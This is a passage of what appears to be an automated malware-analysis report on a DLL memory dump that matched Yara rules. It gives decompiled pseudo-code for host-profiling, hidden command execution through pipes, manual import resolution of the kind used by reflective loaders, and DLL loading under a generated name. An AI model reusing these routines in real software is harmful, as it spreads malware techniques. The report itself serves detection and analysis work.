                                    • API ID:
                                    • String ID: @$\u%04X$\u%04X\u%04X
                                    • API String ID: 0-2132903582
                                    • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                    • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                                    • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                    • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E100121FF(char* __eax, char** _a4, long long* _a8) {
                                    				char* _v8;
                                    				long long _v16;
                                    				char* _t9;
                                    				signed char _t11;
                                    				char** _t19;
                                    				char _t22;
                                    				long long _t32;
                                    				long long _t33;
                                    
                                    				_t9 = __eax;
                                    				L100122CD();
                                    				_t19 = _a4;
                                    				_t22 =  *__eax;
                                    				if( *_t22 != 0x2e) {
                                    					_t9 = strchr( *_t19, 0x2e);
                                    					if(_t9 != 0) {
                                    						 *_t9 =  *_t22;
                                    					}
                                    				}
                                    				L10012291();
                                    				 *_t9 =  *_t9 & 0x00000000;
                                    				_t11 = strtod( *_t19,  &_v8);
                                    				asm("fst qword [ebp-0xc]");
                                    				_t32 =  *0x10018250;
                                    				asm("fucomp st1");
                                    				asm("fnstsw ax");
                                    				if((_t11 & 0x00000044) != 0) {
                                    					L5:
                                    					st0 = _t32;
                                    					L10012291();
                                    					if( *_t11 != 0x22) {
                                    						_t33 = _v16;
                                    						goto L8;
                                    					} else {
                                    						return _t11 | 0xffffffff;
                                    					}
                                    				} else {
                                    					_t33 =  *0x10018258;
                                    					asm("fucomp st1");
                                    					asm("fnstsw ax");
                                    					if((_t11 & 0x00000044) != 0) {
                                    						L8:
                                    						 *_a8 = _t33;
                                    						return 0;
                                    					} else {
                                    						goto L5;
                                    					}
                                    				}
                                    			}












                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _errno$localeconvstrchrstrtod
                                    • String ID:
                                    • API String ID: 1035490122-0
                                    • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                    • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                                    • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                    • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E1000CF84(void* __ecx) {
                                    				intOrPtr _t11;
                                    				long _t12;
                                    				intOrPtr _t17;
                                    				intOrPtr _t18;
                                    				struct _OSVERSIONINFOA* _t29;
                                    
                                    				_push(__ecx);
                                    				_t29 =  *0x1001e688; // 0x8a40590
                                    				GetCurrentProcess();
                                    				_t11 = E1000BA05();
                                    				_t1 = _t29 + 0x1644; // 0x8a41bd4
                                    				_t25 = _t1;
                                    				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                    				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                    				_t33 = _t12;
                                    				if(_t12 != 0) {
                                    					_t12 = E10008FBE(_t25, _t33);
                                    				}
                                    				_t3 = _t29 + 0x228; // 0x8a407b8
                                    				 *(_t29 + 0x1854) = _t12;
                                    				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
                                    				memset(_t29, 0, 0x9c);
                                    				_t29->dwOSVersionInfoSize = 0x9c;
                                    				GetVersionExA(_t29);
                                    				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                    				_t17 = E1000E3B6(_t3);
                                    				_t7 = _t29 + 0x220; // 0x8a407b0
                                    				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                    				_t18 = E1000E3F1(_t7);
                                    				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                    				return _t18;
                                    			}









                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,08A40590,?,10003545), ref: 1000CF90
                                    • GetModuleFileNameW.KERNEL32(00000000,08A41BD4,00000105,?,?,08A40590,?,10003545), ref: 1000CFB1
                                    • memset.MSVCRT ref: 1000CFE2
                                    • GetVersionExA.KERNEL32(08A40590,08A40590,?,10003545), ref: 1000CFED
                                    • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess$FileModuleNameVersionmemset
                                    • String ID:
                                    • API String ID: 3581039275-0
                                    • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                                    • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
                                    • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                                    • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E1000A9B7(signed int __ecx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				signed int _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				struct _SECURITY_ATTRIBUTES _v48;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				void* _v84;
                                    				short _v92;
                                    				intOrPtr _v96;
                                    				void _v140;
                                    				intOrPtr _t77;
                                    				void* _t79;
                                    				intOrPtr _t85;
                                    				intOrPtr _t87;
                                    				intOrPtr _t89;
                                    				intOrPtr _t92;
                                    				intOrPtr _t98;
                                    				intOrPtr _t100;
                                    				intOrPtr _t102;
                                    				long _t111;
                                    				intOrPtr _t115;
                                    				intOrPtr _t126;
                                    				void* _t127;
                                    				void* _t128;
                                    				void* _t129;
                                    				void* _t130;
                                    
                                    				_t111 = 0;
                                    				_v24 = __ecx;
                                    				_v12 = 0;
                                    				_v20 = 0;
                                    				_t127 = 0;
                                    				_v8 = 0;
                                    				_v16 = 0;
                                    				_v48.nLength = 0xc;
                                    				_v48.lpSecurityDescriptor = 0;
                                    				_v48.bInheritHandle = 1;
                                    				_v28 = 0;
                                    				memset( &_v140, 0, 0x44);
                                    				asm("stosd");
                                    				_t130 = _t129 + 0xc;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                    					L18:
                                    					return 0;
                                    				}
                                    				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                    					L13:
                                    					E1000861A( &_v28, 0);
                                    					if(_v20 != 0) {
                                    						_t77 =  *0x1001e684; // 0x8abfaa0
                                    						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                    					}
                                    					if(_v8 != 0) {
                                    						_t115 =  *0x1001e684; // 0x8abfaa0
                                    						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                    					}
                                    					return _t111;
                                    				}
                                    				_t79 = _v16;
                                    				_v76 = _t79;
                                    				_v80 = _t79;
                                    				_v84 = _v12;
                                    				_v140 = 0x44;
                                    				_v96 = 0x101;
                                    				_v92 = 0;
                                    				_t126 = E10008604(0x1001);
                                    				_v28 = _t126;
                                    				if(_t126 == 0) {
                                    					goto L18;
                                    				}
                                    				_push( &_v64);
                                    				_push( &_v140);
                                    				_t85 =  *0x1001e684; // 0x8abfaa0
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8000000);
                                    				_push(1);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_v24);
                                    				_push(0);
                                    				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                    					goto L13;
                                    				}
                                    				_t87 =  *0x1001e684; // 0x8abfaa0
                                    				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                    				_t89 =  *0x1001e684; // 0x8abfaa0
                                    				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                    				_v24 = _v24 & 0;
                                    				do {
                                    					_t92 =  *0x1001e684; // 0x8abfaa0
                                    					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                    					 *((char*)(_v24 + _t126)) = 0;
                                    					if(_t111 == 0) {
                                    						_t127 = E100091A6(_t126, 0);
                                    					} else {
                                    						_push(0);
                                    						_push(_t126);
                                    						_v32 = _t127;
                                    						_t127 = E10009292(_t127);
                                    						E1000861A( &_v32, 0xffffffff);
                                    						_t130 = _t130 + 0x14;
                                    					}
                                    					_t111 = _t127;
                                    					_v32 = _t127;
                                    				} while (_v36 != 0);
                                    				_push( &_v36);
                                    				_push(E1000C379(_t127));
                                    				_t98 =  *0x1001e68c; // 0x8abfc68
                                    				_push(_t127);
                                    				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                    					L12:
                                    					_t100 =  *0x1001e684; // 0x8abfaa0
                                    					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                    					_t102 =  *0x1001e684; // 0x8abfaa0
                                    					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                    					goto L13;
                                    				}
                                    				_t128 = E10009256(_t127);
                                    				if(_t128 == 0) {
                                    					goto L12;
                                    				}
                                    				E1000861A( &_v32, 0);
                                    				return _t128;
                                    			}





































                                    APIs
                                    • memset.MSVCRT ref: 1000A9F4
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                                    • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                      • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHeapPipe$AllocFreememset
                                    • String ID: D
                                    • API String ID: 488076629-2746444292
                                    • Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                                    • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
                                    • Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                                    • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E1001249B(signed int __eax, intOrPtr _a4) {
                                    				intOrPtr* _v8;
                                    				signed int* _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				intOrPtr _v32;
                                    				struct HINSTANCE__* _v36;
                                    				intOrPtr _v40;
                                    				signed int _v44;
                                    				struct HINSTANCE__* _v48;
                                    				intOrPtr _v52;
                                    				signed int _v56;
                                    				intOrPtr _v60;
                                    				signed int _v64;
                                    				signed int _t109;
                                    				signed int _t112;
                                    				signed int _t115;
                                    				void* _t163;
                                    
                                    				_v44 = _v44 & 0x00000000;
                                    				if(_a4 != 0) {
                                    					_v48 = GetModuleHandleA("kernel32.dll");
                                    					_v40 = E1000E099(_v48, "GetProcAddress");
                                    					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                    					_v32 = _v52;
                                    					_t109 = 8;
                                    					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                    						L24:
                                    						return 0;
                                    					}
                                    					_v56 = 0x80000000;
                                    					_t112 = 8;
                                    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                    						_v8 = _v8 + 0x14;
                                    					}
                                    					_t115 = 8;
                                    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                    						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
                                    						if(_v36 != 0) {
                                    							if( *_v8 == 0) {
                                    								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                    							} else {
                                    								_v12 =  *_v8 + _a4;
                                    							}
                                    							_v28 = _v28 & 0x00000000;
                                    							while( *_v12 != 0) {
                                    								_v24 = _v24 & 0x00000000;
                                    								_v16 = _v16 & 0x00000000;
                                    								_v64 = _v64 & 0x00000000;
                                    								_v20 = _v20 & 0x00000000;
                                    								if(( *_v12 & _v56) == 0) {
                                    									_v60 =  *_v12 + _a4;
                                    									_v20 = _v60 + 2;
                                    									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                    									_v16 = _v40(_v36, _v20);
                                    								} else {
                                    									_v24 =  *_v12;
                                    									_v20 = _v24 & 0x0000ffff;
                                    									_v16 = _v40(_v36, _v20);
                                    								}
                                    								if(_v24 != _v16) {
                                    									_v44 = _v44 + 1;
                                    									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                    										 *_v12 = _v16;
                                    									} else {
                                    										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                    									}
                                    								}
                                    								_v12 =  &(_v12[1]);
                                    								_v28 = _v28 + 4;
                                    							}
                                    							_v8 = _v8 + 0x14;
                                    							continue;
                                    						}
                                    						_t163 = 0xfffffffd;
                                    						return _t163;
                                    					}
                                    					goto L24;
                                    				}
                                    				return __eax | 0xffffffff;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                                    • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: HandleLibraryLoadModule
                                    • String ID: GetProcAddress$kernel32.dll
                                    • API String ID: 4133054770-1584408056
                                    • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                                    • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                                    • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                                    • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				void _v140;
                                    				signed char _t14;
                                    				char _t15;
                                    				intOrPtr _t20;
                                    				void* _t25;
                                    				intOrPtr _t26;
                                    				intOrPtr _t32;
                                    				WCHAR* _t34;
                                    				intOrPtr _t35;
                                    				struct HINSTANCE__* _t37;
                                    				int _t38;
                                    				intOrPtr _t46;
                                    				void* _t47;
                                    				intOrPtr _t50;
                                    				void* _t60;
                                    				void* _t61;
                                    				char _t62;
                                    				char* _t63;
                                    				void* _t65;
                                    				intOrPtr _t66;
                                    				char _t68;
                                    
                                    				_t65 = __esi;
                                    				_t61 = __edi;
                                    				_t47 = __ebx;
                                    				_t50 =  *0x1001e688; // 0x8a40590
                                    				_t14 =  *(_t50 + 0x1898);
                                    				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                    					_t15 = E100095E1(_t50, 0xb62);
                                    					_t66 =  *0x1001e688; // 0x8a40590
                                    					_t62 = _t15;
                                    					_t67 = _t66 + 0xb0;
                                    					_v8 = _t62;
                                    					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
                                    					_t20 =  *0x1001e688; // 0x8a40590
                                    					asm("sbb eax, eax");
                                    					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                                    					_t63 = "\\";
                                    					_t26 =  *0x1001e688; // 0x8a40590
                                    					_t68 = E100092E5(_t26 + 0x1020);
                                    					_v12 = _t68;
                                    					E100085D5( &_v8);
                                    					_t32 =  *0x1001e688; // 0x8a40590
                                    					_t34 = E100092E5(_t32 + 0x122a);
                                    					 *0x1001e784 = _t34;
                                    					_t35 =  *0x1001e684; // 0x8abfaa0
                                    					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                    					_t37 = LoadLibraryW( *0x1001e784);
                                    					 *0x1001e77c = _t37;
                                    					if(_t37 == 0) {
                                    						_t38 = 0;
                                    					} else {
                                    						_push(_t37);
                                    						_t60 = 0x28;
                                    						_t38 = E1000E171(0x1001bb48, _t60);
                                    					}
                                    					 *0x1001e780 = _t38;
                                    					E1000861A( &_v12, 0xfffffffe);
                                    					memset( &_v140, 0, 0x80);
                                    					if( *0x1001e780 != 0) {
                                    						goto L10;
                                    					} else {
                                    						E1000861A(0x1001e784, 0xfffffffe);
                                    						goto L8;
                                    					}
                                    				} else {
                                    					L8:
                                    					if( *0x1001e780 == 0) {
                                    						_t46 =  *0x1001e6bc; // 0x8abfbc8
                                    						 *0x1001e780 = _t46;
                                    					}
                                    					L10:
                                    					return 1;
                                    				}
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoadmemset
                                    • String ID: %08x$dll
                                    • API String ID: 3406617148-2963171978
                                    • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                                    • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                                    • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                                    • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 99%
                                    			E10012D70(int _a4, signed int _a8) {
                                    				int _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				void* __esi;
                                    				void* _t137;
                                    				signed int _t141;
                                    				intOrPtr* _t142;
                                    				signed int _t145;
                                    				signed int _t146;
                                    				intOrPtr _t151;
                                    				intOrPtr _t161;
                                    				intOrPtr _t162;
                                    				intOrPtr _t167;
                                    				intOrPtr _t170;
                                    				signed int _t172;
                                    				intOrPtr _t173;
                                    				int _t184;
                                    				intOrPtr _t185;
                                    				intOrPtr _t188;
                                    				signed int _t189;
                                    				void* _t195;
                                    				int _t202;
                                    				int _t208;
                                    				intOrPtr _t217;
                                    				signed int _t218;
                                    				int _t219;
                                    				intOrPtr _t220;
                                    				signed int _t221;
                                    				signed int _t222;
                                    				int _t224;
                                    				int _t225;
                                    				signed int _t227;
                                    				intOrPtr _t228;
                                    				int _t232;
                                    				int _t234;
                                    				signed int _t235;
                                    				int _t239;
                                    				void* _t240;
                                    				int _t245;
                                    				int _t252;
                                    				signed int _t253;
                                    				int _t254;
                                    				void* _t257;
                                    				void* _t258;
                                    				int _t259;
                                    				intOrPtr _t260;
                                    				int _t261;
                                    				signed int _t269;
                                    				signed int _t271;
                                    				intOrPtr* _t272;
                                    				void* _t273;
                                    
                                    				_t253 = _a8;
                                    				_t272 = _a4;
                                    				_t3 = _t272 + 0xc; // 0x452bf84d
                                    				_t4 = _t272 + 0x2c; // 0x8df075ff
                                    				_t228 =  *_t4;
                                    				_t137 =  *_t3 + 0xfffffffb;
                                    				_t229 =  <=  ? _t137 : _t228;
                                    				_v16 =  <=  ? _t137 : _t228;
                                    				_t269 = 0;
                                    				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                    				asm("o16 nop [eax+eax]");
                                    				while(1) {
                                    					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                                    					_t141 =  *_t8 + 0x2a >> 3;
                                    					_v12 = 0xffff;
                                    					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                    					if(_t217 < _t141) {
                                    						break;
                                    					}
                                    					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                    					_t12 = _t272 + 0x5c; // 0x84e85000
                                    					_t245 =  *_t11 -  *_t12;
                                    					_v8 = _t245;
                                    					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                    					_t247 =  <  ? _t195 : _v12;
                                    					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                    					if(_t227 >= _v16) {
                                    						L7:
                                    						if(_t253 != 4) {
                                    							L10:
                                    							_t269 = 0;
                                    							__eflags = 0;
                                    						} else {
                                    							_t285 = _t227 - _t195;
                                    							if(_t227 != _t195) {
                                    								goto L10;
                                    							} else {
                                    								_t269 = _t253 - 3;
                                    							}
                                    						}
                                    						E10015D90(_t272, _t272, 0, 0, _t269);
                                    						_t18 = _t272 + 0x14; // 0xc703f045
                                    						_t19 = _t272 + 8; // 0x8d000040
                                    						 *( *_t18 +  *_t19 - 4) = _t227;
                                    						_t22 = _t272 + 0x14; // 0xc703f045
                                    						_t23 = _t272 + 8; // 0x8d000040
                                    						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                    						_t26 = _t272 + 0x14; // 0xc703f045
                                    						_t27 = _t272 + 8; // 0x8d000040
                                    						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                    						_t30 = _t272 + 0x14; // 0xc703f045
                                    						_t31 = _t272 + 8; // 0x8d000040
                                    						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                    						E10014AF0(_t285,  *_t272);
                                    						_t202 = _v8;
                                    						_t273 = _t273 + 0x14;
                                    						if(_t202 != 0) {
                                    							_t208 =  >  ? _t227 : _t202;
                                    							_v8 = _t208;
                                    							_t36 = _t272 + 0x38; // 0xf47d8bff
                                    							_t37 = _t272 + 0x5c; // 0x84e85000
                                    							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                    							_t273 = _t273 + 0xc;
                                    							_t252 = _v8;
                                    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                    							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                    							_t227 = _t227 - _t252;
                                    						}
                                    						if(_t227 != 0) {
                                    							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
                                    							_t273 = _t273 + 0xc;
                                    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                    						}
                                    						_t253 = _a8;
                                    						if(_t269 == 0) {
                                    							continue;
                                    						}
                                    					} else {
                                    						if(_t227 != 0 || _t253 == 4) {
                                    							if(_t253 != 0 && _t227 == _t195) {
                                    								goto L7;
                                    							}
                                    						}
                                    					}
                                    					break;
                                    				}
                                    				_t142 =  *_t272;
                                    				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                    				_a4 = _t232;
                                    				if(_t232 == 0) {
                                    					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                    					_t254 =  *_t83;
                                    				} else {
                                    					_t59 = _t272 + 0x2c; // 0x8df075ff
                                    					_t224 =  *_t59;
                                    					if(_t232 < _t224) {
                                    						_t65 = _t272 + 0x3c; // 0x830cc483
                                    						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                    						_t260 =  *_t66;
                                    						__eflags =  *_t65 - _t260 - _t232;
                                    						if( *_t65 - _t260 <= _t232) {
                                    							_t67 = _t272 + 0x38; // 0xf47d8bff
                                    							_t261 = _t260 - _t224;
                                    							 *(_t272 + 0x6c) = _t261;
                                    							memcpy( *_t67,  *_t67 + _t224, _t261);
                                    							_t70 = _t272 + 0x16b0; // 0xdf750008
                                    							_t188 =  *_t70;
                                    							_t273 = _t273 + 0xc;
                                    							_t232 = _a4;
                                    							__eflags = _t188 - 2;
                                    							if(_t188 < 2) {
                                    								_t189 = _t188 + 1;
                                    								__eflags = _t189;
                                    								 *(_t272 + 0x16b0) = _t189;
                                    							}
                                    						}
                                    						_t73 = _t272 + 0x38; // 0xf47d8bff
                                    						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                    						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                    						_t225 = _a4;
                                    						_t273 = _t273 + 0xc;
                                    						_t76 = _t272 + 0x6c;
                                    						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                    						__eflags =  *_t76;
                                    						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                    						_t184 =  *_t78;
                                    						_t79 = _t272 + 0x2c; // 0x8df075ff
                                    						_t239 =  *_t79;
                                    					} else {
                                    						 *(_t272 + 0x16b0) = 2;
                                    						_t61 = _t272 + 0x38; // 0xf47d8bff
                                    						memcpy( *_t61,  *_t142 - _t224, _t224);
                                    						_t62 = _t272 + 0x2c; // 0x8df075ff
                                    						_t184 =  *_t62;
                                    						_t273 = _t273 + 0xc;
                                    						_t225 = _a4;
                                    						_t239 = _t184;
                                    						 *(_t272 + 0x6c) = _t184;
                                    					}
                                    					_t254 = _t184;
                                    					 *(_t272 + 0x5c) = _t184;
                                    					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                                    					_t185 =  *_t81;
                                    					_t240 = _t239 - _t185;
                                    					_t241 =  <=  ? _t225 : _t240;
                                    					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                    					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                    				}
                                    				if( *(_t272 + 0x16c0) < _t254) {
                                    					 *(_t272 + 0x16c0) = _t254;
                                    				}
                                    				if(_t269 == 0) {
                                    					_t218 = _a8;
                                    					__eflags = _t218;
                                    					if(_t218 == 0) {
                                    						L34:
                                    						_t89 = _t272 + 0x3c; // 0x830cc483
                                    						_t219 =  *_t272;
                                    						_t145 =  *_t89 - _t254 - 1;
                                    						_a4 =  *_t272;
                                    						_t234 = _t254;
                                    						_v16 = _t145;
                                    						_v8 = _t254;
                                    						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                    						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                    							_v8 = _t254;
                                    							_t95 = _t272 + 0x5c; // 0x84e85000
                                    							_a4 = _t219;
                                    							_t234 = _t254;
                                    							_t97 = _t272 + 0x2c; // 0x8df075ff
                                    							__eflags =  *_t95 -  *_t97;
                                    							if( *_t95 >=  *_t97) {
                                    								_t98 = _t272 + 0x2c; // 0x8df075ff
                                    								_t167 =  *_t98;
                                    								_t259 = _t254 - _t167;
                                    								_t99 = _t272 + 0x38; // 0xf47d8bff
                                    								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                    								 *(_t272 + 0x6c) = _t259;
                                    								memcpy( *_t99, _t167 +  *_t99, _t259);
                                    								_t103 = _t272 + 0x16b0; // 0xdf750008
                                    								_t170 =  *_t103;
                                    								_t273 = _t273 + 0xc;
                                    								__eflags = _t170 - 2;
                                    								if(_t170 < 2) {
                                    									_t172 = _t170 + 1;
                                    									__eflags = _t172;
                                    									 *(_t272 + 0x16b0) = _t172;
                                    								}
                                    								_t106 = _t272 + 0x2c; // 0x8df075ff
                                    								_t145 = _v16 +  *_t106;
                                    								__eflags = _t145;
                                    								_a4 =  *_t272;
                                    								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                    								_t234 =  *_t108;
                                    								_v8 = _t234;
                                    							}
                                    						}
                                    						_t255 = _a4;
                                    						_t220 =  *((intOrPtr*)(_a4 + 4));
                                    						__eflags = _t145 - _t220;
                                    						_t221 =  <=  ? _t145 : _t220;
                                    						_t146 = _t221;
                                    						_a4 = _t221;
                                    						_t222 = _a8;
                                    						__eflags = _t146;
                                    						if(_t146 != 0) {
                                    							_t114 = _t272 + 0x38; // 0xf47d8bff
                                    							E10014C30(_t255,  *_t114 + _v8, _t146);
                                    							_t273 = _t273 + 0xc;
